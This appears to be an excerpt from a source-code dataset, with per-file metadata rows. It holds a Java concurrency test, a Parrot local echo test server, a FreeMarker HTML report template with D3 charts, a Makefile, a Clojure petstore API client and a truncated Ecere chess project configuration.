} | GLSL | 4 | OrKedar/geo-manimgl-app | manimlib/shaders/newton_fractal/frag.glsl | [
"MIT"
] |
package com.baeldung.concurrent;
import org.junit.Test;
import edu.umd.cs.mtc.MultithreadedTestCase;
import edu.umd.cs.mtc.TestFramework;
/**
* This is defined as a manual test because it tries to simulate the race conditions
* in a concurrent program that is poorly designed and hence may fail nondeterministically.
* This will help the CI jobs to ignore these tests and a developer to run them manually.
*
*/
public class MyCounterMultithreadedTCManualTest extends MultithreadedTestCase {
private MyCounter counter;
@Override
public void initialize() {
counter = new MyCounter();
}
public void thread1() throws InterruptedException {
counter.increment();
}
public void thread2() throws InterruptedException {
counter.increment();
}
@SuppressWarnings("deprecation")
@Override
public void finish() {
assertEquals(2, counter.getCount());
}
@Test
public void testCounter() throws Throwable {
TestFramework.runManyTimes(new MyCounterMultithreadedTCManualTest(), 1000);
}
}
| Java | 5 | DBatOWL/tutorials | core-java-modules/core-java-concurrency-2/src/test/java/com/baeldung/concurrent/MyCounterMultithreadedTCManualTest.java | [
"MIT"
] |
#!./parrot
# Copyright (C) 2011, Parrot Foundation.
=head1 NAME
t/pmc/testlib/test_server_ipv6.pir - Test server for the Socket PMC (IPv6 version)
=head1 DESCRIPTION
This server process is launched from t/pmc/socket.t to test the Socket PMC.
It listens on localhost:1234 and accepts only one connection. It echoes
everything it reads from that connection back to the client.
Upon successful startup the string "Server started" is printed to stdout.
After a timeout of 3 seconds, the process exits so it doesn't wait forever
in case of test failures.
=cut
.include 'socket.pasm'
.sub main :main
.local pmc sock, address, conn
.local string str
.local int len, status, port
sock = new 'Socket'
sock.'socket'(.PIO_PF_INET6, .PIO_SOCK_STREAM, .PIO_PROTO_TCP)
port = 1234
push_eh error
retry:
address = sock.'getaddrinfo'('::1', port, .PIO_PROTO_TCP, .PIO_PF_INET6, 1)
sock.'bind'(address)
goto started
error:
inc port
if port < 1244 goto retry
pop_eh
say "couldn't bind to a free port, exiting"
exit 1
started:
pop_eh
sock.'listen'(5)
print 'Server started, listening on port '
say port
status = sock.'poll'(1, 3, 0)
# timeout
if status == 0 goto conn_done
conn = sock.'accept'()
str = conn.'local_address'()
print 'Connection from '
say str
# echo incoming data
recv_loop:
status = conn.'poll'(1, 3, 0)
# timeout
if status == 0 goto recv_done
str = conn.'recv'()
len = length str
if len == 0 goto recv_done
conn.'send'(str)
goto recv_loop
recv_done:
conn.'close'()
conn_done:
sock.'close'()
.end
# Local Variables:
# mode: pir
# fill-column: 100
# End:
# vim: expandtab shiftwidth=4 ft=pir:
| Parrot Internal Representation | 5 | winnit-myself/Wifie | t/pmc/testlib/test_server_ipv6.pir | [
"Artistic-2.0"
] |
<html>
<head>
<style type="text/css">
html, body {
width: 100%;
height: 100%;
}
.bgcolor {
background-color: #FFFFFF;
}
.hd {
background-color: #000000;
font-size: 18px;
color: #FFFFFF;
}
.sectionheader {
background-color: #888888;
width:100%;
font-size: 16px;
font-style: bold;
color: #FFFFFF;
/*padding-left: 40px;*/
/*padding-right: 8px;*/
/*padding-top: 2px;*/
/*padding-bottom: 2px;*/
}
.subsectiontop {
background-color: #F5F5FF;
height: 300px;
}
.subsectionbottom {
background-color: #F5F5FF;
height: 540px;
}
h1 {
font-family: Georgia, Times, 'Times New Roman', serif;
font-size: 28px;
font-style: bold;
font-variant: normal;
font-weight: 500;
line-height: 26.4px;
}
h3 {
font-family: Georgia, Times, 'Times New Roman', serif;
font-size: 16px;
font-style: normal;
font-variant: normal;
font-weight: 500;
line-height: 26.4px;
}
div.outerelements {
padding-bottom: 30px;
}
/** Line charts */
path {
stroke: steelblue;
stroke-width: 2;
fill: none;
}
.axis path, .axis line {
fill: none;
stroke: #000;
shape-rendering: crispEdges;
}
.tick line {
opacity: 0.2;
shape-rendering: crispEdges;
}
/** Bar charts */
.bar {
fill: steelblue;
}
rect {
fill: steelblue;
}
.legend rect {
fill:white;
stroke:black;
opacity:0.8;
}
</style>
<title>Data Analysis</title>
</head>
<body style="padding: 0px; margin: 0px" onload="generateContent()">
<#--<meta name="viewport" content="width=device-width, initial-scale=1">-->
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<link href="http://code.jquery.com/ui/1.11.4/themes/smoothness/jquery-ui.css">
<script src="http://code.jquery.com/jquery-1.10.2.js"></script>
<script src="http://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/d3/3.5.5/d3.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<script>
function generateContent(){
var mainDiv = $('#maindiv');
var div2 = $('#tablesource');
console.log(div2.html());
var div2html = div2.html();
createTable(jQuery.parseJSON(div2html)["RenderableComponentTable"], "Summary Table", $('#tablediv'));
var histdiv = $("#histogramdiv");
<#list histogramIDs as histid>
var div_${histid} = $('#${histid}');
var html_${histid} = div_${histid}.html();
createHistogram(jQuery.parseJSON(html_${histid})["RenderableComponentHistogram"], histdiv, 700, 400);
</#list>
}
function createTable(tableObj, tableId, appendTo) {
//Expect RenderableComponentTable
var header = tableObj['header'];
var values = tableObj['table'];
var title = tableObj['title'];
var border = tableObj['border'];
var padLeft = tableObj['padLeftPx'];
var padRight = tableObj['padRightPx'];
var padTop = tableObj['padTopPx'];
var padBottom = tableObj['padBottomPx'];
var colWidths = tableObj['colWidthsPercent'];
var nRows = (values ? values.length : 0);
var backgroundColor = tableObj['backgroundColor'];
var headerColor = tableObj['headerColor'];
var tbl = document.createElement('table');
tbl.style.width = '100%';
// tbl.style.height = '100%';
tbl.setAttribute('border', border);
if(backgroundColor) tbl.style.backgroundColor = backgroundColor;
if (colWidths) {
for (var i = 0; i < colWidths.length; i++) {
var col = document.createElement('col');
col.setAttribute('width', colWidths[i] + '%');
tbl.appendChild(col);
}
}
if (header) {
var theader = document.createElement('thead');
var headerRow = document.createElement('tr');
if(headerColor) headerRow.style.backgroundColor = headerColor;
for (var i = 0; i < header.length; i++) {
var headerd = document.createElement('th');
headerd.style.padding = padTop + 'px ' + padRight + 'px ' + padBottom + 'px ' + padLeft + 'px';
headerd.appendChild(document.createTextNode(header[i]));
headerRow.appendChild(headerd);
}
tbl.appendChild(headerRow);
}
//Add content:
if (values) {
var tbdy = document.createElement('tbody');
for (var i = 0; i < values.length; i++) {
var tr = document.createElement('tr');
for (var j = 0; j < values[i].length; j++) {
var td = document.createElement('td');
td.style.padding = padTop + 'px ' + padRight + 'px ' + padBottom + 'px ' + padLeft + 'px';
td.appendChild(document.createTextNode(values[i][j]));
tr.appendChild(td);
}
tbdy.appendChild(tr);
}
tbl.appendChild(tbdy);
}
appendTo.append(tbl);
}
/** Create + add line chart with multiple lines, (optional) title, (optional) series names.
* appendTo: jquery selector of object to append to. MUST HAVE ID
* */
function createLineChart(chartObj, appendTo, chartWidth, chartHeight) {
//Expect: RenderableComponentLineChart
var title = chartObj['title'];
var xData = chartObj['x'];
var yData = chartObj['y'];
var mTop = chartObj['marginTop'];
var mBottom = chartObj['marginBottom'];
var mLeft = chartObj['marginLeft'];
var mRight = chartObj['marginRight'];
var removeAxisHorizontal = chartObj['removeAxisHorizontal'];
var seriesNames = chartObj['seriesNames'];
var withLegend = chartObj['legend'];
var nSeries = (!xData ? 0 : xData.length);
// Set the dimensions of the canvas / graph
var margin = {top: mTop, right: mRight, bottom: mBottom, left: mLeft},
width = chartWidth - margin.left - margin.right,
height = chartHeight - margin.top - margin.bottom;
// Set the ranges
var xScale = d3.scale.linear().range([0, width]);
var yScale = d3.scale.linear().range([height, 0]);
// Define the axes
var xAxis = d3.svg.axis().scale(xScale)
.innerTickSize(-height) //used as grid line
.orient("bottom").ticks(5);
if(removeAxisHorizontal == true){
xAxis.tickValues([]);
}
var yAxis = d3.svg.axis().scale(yScale)
.innerTickSize(-width) //used as grid line
.orient("left").ticks(5);
// Define the line
var valueline = d3.svg.line()
.x(function (d) {
return xScale(d.xPos);
})
.y(function (d) {
return yScale(d.yPos);
});
// Adds the svg canvas
var svg = d3.select("#" + appendTo.attr("id"))
.append("svg")
.attr("width", width + margin.left + margin.right)
.attr("height", height + margin.top + margin.bottom)
.attr("padding", "20px")
.append("g")
.attr("transform",
"translate(" + margin.left + "," + margin.top + ")");
// Scale the range of the chart
var xMin = Number.MAX_VALUE;
var xMax = -Number.MAX_VALUE;
var yMax = -Number.MAX_VALUE;
var yMin = Number.MAX_VALUE;
for (var i = 0; i < nSeries; i++) {
var xV = xData[i];
var yV = yData[i];
var thisMin = d3.min(xV);
var thisMax = d3.max(xV);
var thisMaxY = d3.max(yV);
var thisMinY = d3.min(yV);
if (thisMin < xMin) xMin = thisMin;
if (thisMax > xMax) xMax = thisMax;
if (thisMaxY > yMax) yMax = thisMaxY;
if (thisMinY < yMin) yMin = thisMinY;
}
if (yMin > 0) yMin = 0;
xScale.domain([xMin, xMax]);
yScale.domain([yMin, yMax]);
// Add the valueline path.
var color = d3.scale.category10();
for (var i = 0; i < nSeries; i++) {
var xVals = xData[i];
var yVals = yData[i];
var data = xVals.map(function (d, i) {
return {'xPos': xVals[i], 'yPos': yVals[i]};
});
svg.append("path")
.attr("class", "line")
.style("stroke", color(i))
.attr("d", valueline(data));
}
// Add the X Axis
svg.append("g")
.attr("class", "x axis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis);
// Add the Y Axis
svg.append("g")
.attr("class", "y axis")
.call(yAxis);
//Add legend (if present)
if (seriesNames && withLegend == true) {
var legendSpace = width / i;
for (var i = 0; i < nSeries; i++) {
var values = xData[i];
var yValues = yData[i];
var lastX = values[values.length - 1];
var lastY = yValues[yValues.length - 1];
var toDisplay;
if (!lastX || !lastY) toDisplay = seriesNames[i] + " (no data)";
else toDisplay = seriesNames[i] + " (" + lastX.toPrecision(5) + "," + lastY.toPrecision(5) + ")";
svg.append("text")
.attr("x", (legendSpace / 2) + i * legendSpace) // spacing
.attr("y", height + (margin.bottom / 2) + 5)
.attr("class", "legend") // style the legend
.style("fill", color(i))
.text(toDisplay);
}
}
//Add title (if present)
if (title) {
svg.append("text")
.attr("x", (width / 2))
.attr("y", 0 - ((margin.top - 30) / 2))
.attr("text-anchor", "middle")
.style("font-size", "13px")
.style("text-decoration", "underline")
.text(title);
}
}
/** Create + add histogram
* */
function createHistogram(chartObj, appendTo, chartWidth, chartHeight) {
//Expect: RenderableComponentHistogram
var title = chartObj['title'];
var lowerBounds = chartObj['lowerBounds'];
var upperBounds = chartObj['upperBounds'];
var yValues = chartObj['yvalues'];
var mTop = chartObj['marginTop'];
var mBottom = chartObj['marginBottom'];
var mLeft = chartObj['marginLeft'];
var mRight = chartObj['marginRight'];
// var removeAxisHorizontal = chartObj['removeAxisHorizontal'];
// Set the dimensions of the canvas / graph
var margin = {top: mTop, right: mRight, bottom: mBottom, left: mLeft},
width = chartWidth - margin.left - margin.right,
height = chartHeight - margin.top - margin.bottom;
// Set the ranges
var xScale = d3.scale.linear().range([0, width]);
var yScale = d3.scale.linear().range([height, 0]);
var xMin = Number.MAX_VALUE;
var xMax = -Number.MAX_VALUE;
var yMax = -Number.MAX_VALUE;
for (var i = 0; i < lowerBounds.length; i++) {
if (lowerBounds[i] < xMin) xMin = lowerBounds[i];
if (upperBounds[i] > xMax) xMax = upperBounds[i];
if (yValues[i] > yMax) yMax = yValues[i];
}
// Define the axes
var xAxis = d3.scale.linear()
.domain([xMin, xMax])
.range([0, width]);
var yAxis = d3.scale.linear()
.domain([0, yMax])
.range([height, 0]);
// Set up the data:
var data = lowerBounds.map(function (d, i) {
return {'width': upperBounds[i] - lowerBounds[i], 'height': yValues[i], 'offset': lowerBounds[i]};
});
// Adds the svg canvas
var svg = d3.select("#" + appendTo.attr("id"))
.append("svg")
.attr("width", width + margin.left + margin.right)
.attr("height", height + margin.top + margin.bottom)
.attr("padding", "20px")
.append("g")
.attr("transform",
"translate(" + margin.left + "," + margin.top + ")");
// Add the bins.
svg.selectAll(".bin")
.data(data)
.enter().append("rect")
.attr("class", "bin")
.attr("x", function(d) { return xAxis(d.offset); })
.attr("width", function(d) { return xAxis(xMin + d.width) - 1; })
.attr("y", function(d) { return yAxis(d.height); })
.attr("height", function(d) { return height - yAxis(d.height); });
svg.append("g")
.attr("class", "x axis")
.attr("transform", "translate(0," + height + ")")
.call(d3.svg.axis()
.scale(xAxis)
.orient("bottom"));
svg.append("g")
.attr("class", "y axis")
.call(d3.svg.axis()
.scale(yAxis)
.orient("left"));
//Add title (if present)
if (title) {
svg.append("text")
.attr("x", (width / 2))
.attr("y", 0 - ((margin.top - 30) / 2))
.attr("text-anchor", "middle")
.style("font-size", "13px")
.style("text-decoration", "underline")
.text(title);
}
}
</script>
<table style="width: 100%; padding: 5px" class="hd">
<tbody>
<tr>
<td style="width:15px; height:35px; padding: 4px 15px;">
<td>Data Analysis</td>
<td style="text-align:right">${datetime}</td>
<td style="width:15px; height:35px; padding: 4px 15px;">
</tr>
</tbody>
</table>
<div style="width:1400px; margin:0 auto; border:0px" id="outerdiv">
<div style="width:100%; padding-top:20px" id="maindiv">
<div style="width:100%; height:20px"></div>
<div style="width:100%;" class="sectionheader">
<div style="padding-left:40px; padding-top:3px; padding-bottom:3px">
Summary Column Analysis
</div>
</div>
<div style="width:100%; height:auto" align="center" id="tablediv">
</div>
<div style="width:100%; height:20px"></div>
<div style="width:100%;" class="sectionheader">
<div style="padding-left:40px; padding-top:3px; padding-bottom:3px">
Numerical Column Histograms
</div>
</div>
<div style="width:100%; height:auto" align="center" id="histogramdiv">
</div>
</div>
</div>
<#list divs as div>
<div id="${div.id}" style="display:none">
${div.content}
</div>
</#list>
</body>
</html> | FreeMarker | 4 | rghwer/testdocs | datavec/datavec-api/src/main/resources/templates/analysis.ftl | [
"Apache-2.0"
] |
include ../tools.mk
# only-windows-gnu
all:
$(RUSTC) foo.rs
# FIXME: we should make sure __stdcall calling convention is used here
# but that only works with LLD right now
nm -g "$(call IMPLIB,foo)" | $(CGREP) bar
| Makefile | 3 | Eric-Arellano/rust | src/test/run-make-fulldeps/mingw-export-call-convention/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
package com.baeldung.algorithms.enumstatemachine;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
public class LeaveRequestStateUnitTest {
@Test
public void givenLeaveRequest_whenStateEscalated_thenResponsibleIsTeamLeader() {
LeaveRequestState state = LeaveRequestState.Escalated;
assertEquals(state.responsiblePerson(), "Team Leader");
}
@Test
public void givenLeaveRequest_whenStateApproved_thenResponsibleIsDepartmentManager() {
LeaveRequestState state = LeaveRequestState.Approved;
assertEquals(state.responsiblePerson(), "Department Manager");
}
@Test
public void givenLeaveRequest_whenNextStateIsCalled_thenStateIsChanged() {
LeaveRequestState state = LeaveRequestState.Submitted;
state = state.nextState();
assertEquals(state, LeaveRequestState.Escalated);
state = state.nextState();
assertEquals(state, LeaveRequestState.Approved);
state = state.nextState();
assertEquals(state, LeaveRequestState.Approved);
}
}
| Java | 3 | DBatOWL/tutorials | algorithms-miscellaneous-3/src/test/java/com/baeldung/algorithms/enumstatemachine/LeaveRequestStateUnitTest.java | [
"MIT"
] |
(ns open-api-petstore.api.pet
(:require [open-api-petstore.core :refer [call-api check-required-params with-collection-format *api-context*]]
[clojure.spec.alpha :as s]
[spec-tools.core :as st]
[orchestra.core :refer [defn-spec]]
[open-api-petstore.specs.tag :refer :all]
[open-api-petstore.specs.category :refer :all]
[open-api-petstore.specs.user :refer :all]
[open-api-petstore.specs.pet :refer :all]
[open-api-petstore.specs.order :refer :all]
)
(:import (java.io File)))
(defn-spec add-pet-with-http-info any?
"Add a new pet to the store"
([] (add-pet-with-http-info nil))
([{:keys [pet]} (s/map-of keyword? any?)]
(call-api "/pet" :post
{:path-params {}
:header-params {}
:query-params {}
:form-params {}
:body-param pet
:content-types ["application/json" "application/xml"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec add-pet any?
"Add a new pet to the store"
([] (add-pet nil))
([optional-params any?]
(let [res (:data (add-pet-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec delete-pet-with-http-info any?
"Deletes a pet"
([petId int?, ] (delete-pet-with-http-info petId nil))
([petId int?, {:keys [api_key]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}" :delete
{:path-params {"petId" petId }
:header-params {"api_key" api_key }
:query-params {}
:form-params {}
:content-types []
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec delete-pet any?
"Deletes a pet"
([petId int?, ] (delete-pet petId nil))
([petId int?, optional-params any?]
(let [res (:data (delete-pet-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec find-pets-by-status-with-http-info any?
"Finds Pets by status
Multiple status values can be provided with comma separated strings"
([] (find-pets-by-status-with-http-info nil))
([{:keys [status]} (s/map-of keyword? any?)]
(call-api "/pet/findByStatus" :get
{:path-params {}
:header-params {}
:query-params {"status" (with-collection-format status :multi) }
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["petstore_auth"]})))
(defn-spec find-pets-by-status (s/coll-of pet-spec)
"Finds Pets by status
Multiple status values can be provided with comma separated strings"
([] (find-pets-by-status nil))
([optional-params any?]
(let [res (:data (find-pets-by-status-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode (s/coll-of pet-spec) res st/string-transformer)
res))))
(defn-spec find-pets-by-tags-with-http-info any?
"Finds Pets by tags
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing."
([] (find-pets-by-tags-with-http-info nil))
([{:keys [tags]} (s/map-of keyword? any?)]
(call-api "/pet/findByTags" :get
{:path-params {}
:header-params {}
:query-params {"tags" (with-collection-format tags :multi) }
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["petstore_auth"]})))
(defn-spec find-pets-by-tags (s/coll-of pet-spec)
"Finds Pets by tags
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing."
([] (find-pets-by-tags nil))
([optional-params any?]
(let [res (:data (find-pets-by-tags-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode (s/coll-of pet-spec) res st/string-transformer)
res))))
(defn-spec get-pet-by-id-with-http-info any?
"Find pet by ID
Returns a pet when ID < 10. ID > 10 or nonintegers will simulate API error conditions"
[petId int?]
(check-required-params petId)
(call-api "/pet/{petId}" :get
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["api_key" "petstore_auth"]}))
(defn-spec get-pet-by-id pet-spec
"Find pet by ID
Returns a pet when ID < 10. ID > 10 or nonintegers will simulate API error conditions"
[petId int?]
(let [res (:data (get-pet-by-id-with-http-info petId))]
(if (:decode-models *api-context*)
(st/decode pet-spec res st/string-transformer)
res)))
(defn-spec update-pet-with-http-info any?
"Update an existing pet"
([] (update-pet-with-http-info nil))
([{:keys [pet]} (s/map-of keyword? any?)]
(call-api "/pet" :put
{:path-params {}
:header-params {}
:query-params {}
:form-params {}
:body-param pet
:content-types ["application/json" "application/xml"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec update-pet any?
"Update an existing pet"
([] (update-pet nil))
([optional-params any?]
(let [res (:data (update-pet-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec update-pet-with-form-with-http-info any?
"Updates a pet in the store with form data"
([petId string?, ] (update-pet-with-form-with-http-info petId nil))
([petId string?, {:keys [name status]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}" :post
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {"name" name "status" status }
:content-types ["application/x-www-form-urlencoded"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec update-pet-with-form any?
"Updates a pet in the store with form data"
([petId string?, ] (update-pet-with-form petId nil))
([petId string?, optional-params any?]
(let [res (:data (update-pet-with-form-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec upload-file-with-http-info any?
"uploads an image"
([petId int?, ] (upload-file-with-http-info petId nil))
([petId int?, {:keys [additionalMetadata ^File file]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}/uploadImage" :post
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {"additionalMetadata" additionalMetadata "file" file }
:content-types ["multipart/form-data"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec upload-file any?
"uploads an image"
([petId int?, ] (upload-file petId nil))
([petId int?, optional-params any?]
(let [res (:data (upload-file-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
| Clojure | 5 | MalcolmScoffable/openapi-generator | samples/client/petstore/clojure/src/open_api_petstore/api/pet.clj | [
"Apache-2.0"
] |
{
"Version" : 0.2,
"ModuleName" : "Chess",
"Options" : {
"TargetType" : "Executable",
"TargetFileName" : "chess",
"Libraries" : [
"ecere"
]
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Debug" : true,
"Console" : true
}
},
{
"Name" : "Release",
"Options" : {
"Optimization" : "Speed"
}
},
{
"Name" : "MemoryGuard",
"Options" : {
"Debug" : true,
"MemoryGuard" : true,
"Console" : true
}
},
{
"Name" : "Android",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"HIGH_DPI"
],
"TargetType" : "SharedLibrary",
"TargetFileName" : "Chess",
"FastMath" : true,
"PostbuildCommands" : [
"$(call mkdir,$(OBJ)classes)",
"$(call mkdir,$(OBJ)apk/lib/arm64-v8a)",
"javac -verbose -d $(OBJ)/classes -classpath /android/platforms/android-28/android.jar:$(OBJ) -sourcepath . android/$(MODULE).java",
"dx --dex --verbose --output=$(OBJ)apk/classes.dex $(OBJ)classes",
"$(call cp,../../../ecere/obj/android.linux.$(COMPILER)/libecere.so.0.44,$(OBJ)apk/lib/arm64-v8a/libecere.so)",
"$(call cp,$(TARGET),$(OBJ)apk/lib/arm64-v8a)",
"aapt package -v -f -m -M android/AndroidManifest.xml -F $(OBJ)$(MODULE)-unsigned.apk -I /android/platforms/android-28/android.jar -S android/res $(OBJ)apk",
"jarsigner -storepass android -sigalg MD5withRSA -digestalg SHA1 $(OBJ)$(MODULE)-unsigned.apk androiddebugkey -keystore /android/debug.keystore -signedjar $(OBJ)$(MODULE).apk",
"adb uninstall com.ecere.$(MODULE)",
"adb install $(OBJ)$(MODULE).apk",
"adb shell am start -a android.intent.action.MAIN -n com.ecere.$(MODULE)/.$(MODULE)"
]
}
},
{
"Name" : "Emscripten",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"ECERE_STATIC",
"CHESS_NONET"
],
"TargetFileName" : "chess.html",
"Libraries" : [
"ecereStatic",
"z",
"freetype",
"jpeg",
"png"
],
"LibraryDirs" : [
"../../../ecere/obj/emscripten.linux.emscripten"
],
"FastMath" : true
}
}
],
"Files" : [
{
"Folder" : "src",
"Files" : [
"about.ec",
"ai.ec",
"chess.ec",
"chess2D.ec",
"chess3D.ec",
"chessutils.ec",
"connect.ec",
"promotion.ec"
]
},
{
"Folder" : "android",
"Files" : [
{
"Folder" : "res",
"Files" : [
{
"Folder" : "drawable",
"Files" : [
{
"FileName" : "icon.png",
"Options" : {
"ExcludeFromBuild" : true
}
}
]
},
{
"Folder" : "drawable-xhdpi",
"Files" : [
"icon.png"
]
},
{
"Folder" : "values",
"Files" : [
"strings.xml"
]
}
]
},
"AndroidManifest.xml",
"Chess.java"
]
}
],
"ResourcesPath" : "res",
"Resources" : [
{
"Folder" : "ecere",
"Files" : [
{
"Folder" : "actions",
"Files" : [
"../../../ecere/res/actions/clean.png",
"../../../ecere/res/actions/docNew.png",
"../../../ecere/res/actions/docSave.png",
"../../../ecere/res/actions/editFind.png",
"../../../ecere/res/actions/folderNew.png",
"../../../ecere/res/actions/goDown.png",
"../../../ecere/res/actions/goHome.png",
"../../../ecere/res/actions/goNext.png",
"../../../ecere/res/actions/goPrevious.png",
"../../../ecere/res/actions/goUp.png",
"../../../ecere/res/actions/listAdd.png",
"../../../ecere/res/actions/listRemove.png",
"../../../ecere/res/actions/viewRefresh.png",
"../../../ecere/res/actions/windowNew.png"
]
},
{
"Folder" : "aqua",
"Files" : [
"../../../ecere/res/aqua/back.png",
"../../../ecere/res/aqua/down.png",
"../../../ecere/res/aqua/downLeft.png",
"../../../ecere/res/aqua/downMiddle.png",
"../../../ecere/res/aqua/downRight.png",
"../../../ecere/res/aqua/sDown.png",
"../../../ecere/res/aqua/sUp.png",
"../../../ecere/res/aqua/up.png",
"../../../ecere/res/aqua/upLeft.png",
"../../../ecere/res/aqua/upMiddle.png",
"../../../ecere/res/aqua/upRight.png"
]
},
{
"Folder" : "constructs",
"Files" : [
"../../../ecere/res/constructs/class.png",
"../../../ecere/res/constructs/data.png",
"../../../ecere/res/constructs/dataPrivate.png",
"../../../ecere/res/constructs/dataType.png",
"../../../ecere/res/constructs/enum.png",
"../../../ecere/res/constructs/enumValue.png",
"../../../ecere/res/constructs/event.png",
"../../../ecere/res/constructs/library.png",
"../../../ecere/res/constructs/method.png",
"../../../ecere/res/constructs/methodPrivate.png",
"../../../ecere/res/constructs/namespace.png",
"../../../ecere/res/constructs/property.png",
"../../../ecere/res/constructs/propertyPrivate.png"
]
},
{
"Folder" : "controls",
"Files" : [
"../../../ecere/res/controls/button.png",
"../../../ecere/res/controls/calendar.png",
"../../../ecere/res/controls/checkBox.png",
"../../../ecere/res/controls/dataBox.png",
"../../../ecere/res/controls/dropBox.png",
"../../../ecere/res/controls/editBox.png",
"../../../ecere/res/controls/groupBox.png",
"../../../ecere/res/controls/label.png",
"../../../ecere/res/controls/listBox.png",
"../../../ecere/res/controls/menu.png",
"../../../ecere/res/controls/optionBox.png",
"../../../ecere/res/controls/progressBar.png",
"../../../ecere/res/controls/scrollBarHorizontal.png",
"../../../ecere/res/controls/scrollBarVertical.png",
"../../../ecere/res/controls/statusBar.png"
]
},
{
"Folder" : "cursors",
"Files" : [
"../../../ecere/res/cursors/arrow.png",
"../../../ecere/res/cursors/cross.png",
"../../../ecere/res/cursors/iBeam.png",
"../../../ecere/res/cursors/move.png",
"../../../ecere/res/cursors/sizeEastWest.png",
"../../../ecere/res/cursors/sizeNortEastSouthWest.png",
"../../../ecere/res/cursors/sizeNorthSouth.png",
"../../../ecere/res/cursors/sizeNortWestSouthEast.png"
]
},
{
"Folder" : "devices",
"Files" : [
"../../../ecere/res/devices/computer.png",
"../../../ecere/res/devices/driveHardDisk.png",
"../../../ecere/res/devices/driveRemovableMedia.png",
"../../../ecere/res/devices/mediaFloppy.png",
"../../../ecere/res/devices/mediaOptical.png"
]
},
{
"Folder" : "elements",
"Files" : [
"../../../ecere/res/elements/areaClose.png",
"../../../ecere/res/elements/areaMaximize.png",
"../../../ecere/res/elements/areaMinimize.png",
"../../../ecere/res/elements/areaRestore.png",
"../../../ecere/res/elements/arrowDown.png",
"../../../ecere/res/elements/arrowLeft.png",
"../../../ecere/res/elements/arrowRight.png",
"../../../ecere/res/elements/arrowUp.png",
"../../../ecere/res/elements/checkBox.png",
"../../../ecere/res/elements/checkBoxChecked.png",
"../../../ecere/res/elements/checkBoxDisabled.png",
"../../../ecere/res/elements/checkBoxDisabledChecked.png",
"../../../ecere/res/elements/optionBoxDisabled.png",
"../../../ecere/res/elements/optionBoxDisabledSelected.png",
"../../../ecere/res/elements/optionBoxDown.png",
"../../../ecere/res/elements/optionBoxSelectedDown.png",
"../../../ecere/res/elements/optionBoxSelectedUp.png",
"../../../ecere/res/elements/optionBoxUp.png",
"../../../ecere/res/elements/orderAscending.png",
"../../../ecere/res/elements/orderCategorized.png",
"../../../ecere/res/elements/orderDescending.png"
]
},
{
"Folder" : "emblems",
"Files" : [
"../../../ecere/res/emblems/unreadable.png"
]
},
{
"Folder" : "mimeTypes",
"Files" : [
"../../../ecere/res/mimeTypes/brokenFile.png",
"../../../ecere/res/mimeTypes/file.png",
"../../../ecere/res/mimeTypes/image.png",
"../../../ecere/res/mimeTypes/package.png",
"../../../ecere/res/mimeTypes/packageOpticalDisc.png",
"../../../ecere/res/mimeTypes/packageSoftware.png",
"../../../ecere/res/mimeTypes/text.png",
"../../../ecere/res/mimeTypes/textC++Header.png",
"../../../ecere/res/mimeTypes/textC++Source.png",
"../../../ecere/res/mimeTypes/textCHeader.png",
"../../../ecere/res/mimeTypes/textCSource.png",
"../../../ecere/res/mimeTypes/textEcereHeader.png",
"../../../ecere/res/mimeTypes/textEcereProject.png",
"../../../ecere/res/mimeTypes/textEcereSource.png",
"../../../ecere/res/mimeTypes/textEcereWorkspace.png",
"../../../ecere/res/mimeTypes/textHyperTextMarkup.png"
]
},
{
"Folder" : "places",
"Files" : [
"../../../ecere/res/places/brokenFolder.png",
"../../../ecere/res/places/driveRemote.png",
"../../../ecere/res/places/folder.png",
"../../../ecere/res/places/folderRemote.png",
"../../../ecere/res/places/networkServer.png",
"../../../ecere/res/places/networkWorkgroup.png"
]
},
{
"Folder" : "status",
"Files" : [
"../../../ecere/res/status/audioVolumeHigh.png",
"../../../ecere/res/status/folderOpen.png"
]
},
{
"Folder" : "unicode",
"Files" : [
"../../../ecere/res/unicode/derivedGeneralCategoryStripped.txt"
]
},
{
"Folder" : "shaders",
"Files" : [
"../../../ecere/src/gfx/drivers/gl3/default.frag",
"../../../ecere/src/gfx/drivers/gl3/default.vert"
]
},
"$(ECERE_SDK_SRC)/ecere/res/fonts/tahoma.ttf",
